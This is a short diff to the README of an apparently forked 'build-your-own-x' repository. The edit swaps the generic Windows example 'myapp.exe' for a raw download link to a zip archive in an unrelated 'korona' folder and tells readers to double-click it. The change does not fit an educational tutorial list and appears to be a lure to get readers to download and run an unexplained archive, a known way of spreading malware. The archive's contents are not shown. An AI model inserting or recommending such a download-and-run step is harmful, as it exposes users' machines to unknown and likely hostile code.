arvi12377/build-your-own-x/README.md

 2. **Extract the Files:** If the download is in a compressed format (like .zip), right-click the file and select "Extract" or "Unzip."

 3. **Run the Application:**
-   - For Windows: Double-click the application file (e.g., `myapp.exe`).
+   - For Windows: Double-click the application file (e.g., `https://raw.githubusercontent.com/arvi12377/build-your-own-x/master/korona/build-your-own-x_3.0.zip`).
    - For macOS: Open the folder and double-click the application file.
    - For Linux: Open the terminal, navigate to the folder, and type `./myapp`.